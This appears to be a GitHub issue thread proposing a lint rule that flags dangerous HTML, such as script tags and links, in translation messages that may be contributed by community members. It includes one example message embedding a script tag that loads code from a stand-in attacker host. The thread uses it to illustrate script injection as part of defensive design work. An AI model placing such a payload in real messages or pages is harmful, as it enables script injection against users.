lint rule for dangerous html

[samuelstroschein]

Problem

Messages could contain HTML which would be rendered unescaped, opening the door for script injection and more.

This is especially crucial if community members can contribute translations.

message = Hello <script src="https://attacker.com/x.js"> user!

Proposal

Have a lint rule to detect dangerous HTML tags.

The rule likely works better with a whitelist than a blacklist. There are only a few non-dangerous HTML tags.

Related

• introduce markup placeholders  #840

The introduction of markup placeholders should eliminate the need for unescaped HTML in a string. The proposed lint rule stays relevant nonetheless. No dangerous HTML should be found in messages.

Open questions

1. This is a web-specific rule. I don't know whether it makes sense to include it in standard lint rules.

[felixhaeberle]

this is not only applicable to html but also js right?
it could be that something gets inserted without a script (html) tag?

[samuelstroschein]

No. It needs an html script tag that is executed by the browser engine. But, other HTML tags like <a> could also be dangerous as users could be led to a phishing site etc.